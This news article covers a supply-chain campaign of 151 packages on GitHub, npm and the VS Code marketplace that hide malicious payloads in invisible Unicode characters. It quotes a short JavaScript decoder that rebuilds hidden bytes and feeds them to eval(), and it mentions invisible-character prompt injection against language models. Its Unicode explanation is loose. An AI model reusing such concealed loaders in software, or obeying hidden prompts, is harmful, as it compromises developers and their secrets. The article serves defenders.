The unseen code relies on Private Use Areas (sometimes called Private Use Access), which are ranges in the Unicode specification for characters reserved for private use when defining emojis, flags, and other symbols. Those code points correspond to every letter of the US alphabet when interpreted by computers, yet their output is entirely invisible to people. Reviewers of source or users of static analysis tools encounter only whitespace or empty lines. To a JavaScript interpreter, the same code points represent executable instructions.
The invisible Unicode characters were created decades ago and then mostly forgotten — until 2024, when attackers started using them to hide malicious prompts sent to AI engines. Although the text remained unseen by humans and many scanners, large language models could read the characters and obey the hidden instructions. AI platforms have deployed safeguards to limit use of these characters, but those protections are occasionally bypassed.
After that, the Unicode trick began appearing in more conventional malware campaigns. In one package Aikido examined in Friday’s write-up, attackers encoded a malicious payload with invisible characters. A cursory look at the code reveals nothing; during JavaScript execution, however, a tiny decoder reconstructs the actual bytes and feeds them to eval().
const s = v => [...v].map(w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));“The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”
Since discovering the recent set of packages on GitHub, researchers have spotted similar items on npm and the VS Code marketplace. Aikido noted the 151 identified packages are probably only a portion of the campaign, as many were removed after being uploaded.
The most effective defense against supply-chain attacks remains careful inspection of packages and their dependencies before adding them to projects. That means checking package names closely and searching for misspellings. If concerns about LLM-assisted concealment are valid, malicious packages may increasingly masquerade as legitimate ones, especially when invisible Unicode characters are used to hide harmful payloads.
